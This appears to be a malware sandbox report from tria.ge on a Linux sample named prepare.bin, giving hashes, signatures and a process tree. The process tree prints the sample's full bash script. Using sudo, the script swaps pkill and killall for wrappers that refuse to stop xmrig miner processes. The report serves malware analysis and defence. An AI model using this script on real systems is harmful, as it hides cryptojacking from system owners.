Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

1

prepare.bin

ubuntu-18.04-amd64

1

prepare.bin

ubuntu-20.04-amd64

1

prepare.bin

ubuntu-22.04-amd64

6

prepare.bin

ubuntu-24.04-amd64

6

Analysis

  • max time kernel
    0s
  • max time network
    5s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    02/09/2024, 00:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    prepare.bin

  • Size

    15KB

  • MD5

    9304c43102d72225b64e2031c26f4975

  • SHA1

    b898d1cb78830ffb21592f8fc4be8b7ac7d703d1

  • SHA256

    636c27eaaa247cc54c71ec7b0572f751b85f6e6c5895010050cc644a5575b092

  • SHA512

    70df19f4039b794382cb262fb7dd428c951554c473df016bf9b5d896b43e035444ecbaa56fd16b90a595962647cd78187319e16f92d082e9c566757569705f11

  • SSDEEP

    192:R+SwY2gFtlURaF19loEKDOZNXPTRhgPRMYiwSKvUE:dxtlSGKDOvfTRQRMtRE

Score
6/10

Malware Config

Signatures

  • Write file to user bin folder 1 TTPs 2 IoCs
  • Reads runtime system information 30 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/prepare.bin
    /tmp/prepare.bin
    1⤵
      PID:2595
    • /bin/bash
      /tmp/prepare.bin -c "exec '/tmp/prepare.bin' \"\$@\"" /tmp/prepare.bin
      1⤵
        PID:2595
      • /tmp/prepare.bin
        /tmp/prepare.bin
        1⤵
          PID:2595
        • /bin/bash
          /tmp/prepare.bin -c " #!/bin/bash # check if user has sudo, else exit sudo -n true if [ \$? -eq 0 ]; then echo \"You have sudo permissions.\" else echo \"You do not have sudo permissions.\" exit 1 fi # -------- PKILL SECTION -------- result=\$(which pkill) sudo -n mv \$result \$result.bak sudo -n echo '#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else pkill.bak \"\$@\" fi' > \$result sudo -n chmod +x \$result # -------- KILLALL SECTION -------- result=\$(which killall) sudo -n mv \$result \$result.bak sudo -n echo '#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else killall.bak \"\$@\" fi' > \$result sudo -n chmod +x \$result" /tmp/prepare.bin
          1⤵
          • Write file to user bin folder
          PID:2595
          • /usr/bin/sudo
            sudo -n true
            2⤵
            • Reads runtime system information
            PID:2596
            • /usr/bin/true
              true
              3⤵
                PID:2597
            • /usr/bin/which
              which pkill
              2⤵
                PID:2598
              • /usr/bin/sudo
                sudo -n mv /usr/bin/pkill /usr/bin/pkill.bak
                2⤵
                • Reads runtime system information
                PID:2599
                • /usr/bin/mv
                  mv /usr/bin/pkill /usr/bin/pkill.bak
                  3⤵
                  • Reads runtime system information
                  PID:2600
              • /usr/bin/sudo
                sudo -n echo "#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else pkill.bak \"\$@\" fi"
                2⤵
                • Reads runtime system information
                PID:2601
                • /usr/bin/echo
                  echo "#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else pkill.bak \"\$@\" fi"
                  3⤵
                    PID:2602
                • /usr/bin/sudo
                  sudo -n chmod +x /usr/bin/pkill
                  2⤵
                  • Reads runtime system information
                  PID:2603
                  • /usr/bin/chmod
                    chmod +x /usr/bin/pkill
                    3⤵
                      PID:2604
                  • /usr/bin/which
                    which killall
                    2⤵
                      PID:2605
                    • /usr/bin/sudo
                      sudo -n mv /usr/bin/killall /usr/bin/killall.bak
                      2⤵
                      • Reads runtime system information
                      PID:2606
                      • /usr/bin/mv
                        mv /usr/bin/killall /usr/bin/killall.bak
                        3⤵
                        • Reads runtime system information
                        PID:2607
                    • /usr/bin/sudo
                      sudo -n echo "#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else killall.bak \"\$@\" fi"
                      2⤵
                      • Reads runtime system information
                      PID:2608
                      • /usr/bin/echo
                        echo "#!/bin/bash if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then exit 1 else killall.bak \"\$@\" fi"
                        3⤵
                          PID:2609
                    • /usr/bin/sudo
                      sudo -n chmod +x /usr/bin/killall
                      1⤵
                      • Reads runtime system information
                      PID:2595
                      • /usr/bin/chmod
                        chmod +x /usr/bin/killall
                        2⤵
                          PID:2613

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /usr/bin/killall
                        Filesize

                        142B

                        MD5

                        b02773cbcd5ea8921fbac0b5c577d923

                        SHA1

                        1117beac3937d9280678f433d6c7fa51c1e00b0b

                        SHA256

                        f4a1d3344d10e4941aa67977b9edb8214b56f532fafc00b66690a0ebfd8ad612

                        SHA512

                        c95575e85983e9a0ee2e312d008a5f52cf9c5923800b9f613038400116e254b9c27ae5a3f449357b0724269063bb9930b35e227a05a0e922b5bc3f2246da973c

                        Download Submit

                      • /usr/bin/pkill
                        Filesize

                        140B

                        MD5

                        50c285d9bda626a5f6332495ea4527c2

                        SHA1

                        a72dd91ff971ed8bb5ba482ccb357d834500d672

                        SHA256

                        61cf2020ce8c121cd8312fb03e724077fc43efa3737cf2c3cebc5ad45b39b021

                        SHA512

                        2b49d193929e8c0fd82c89c535626f47475cff8f477a75054d0e35eb6fb402161a98e19526af9fa64d1a885746959a9c8988dd28f3efb6853179982902482adc

                        Download Submit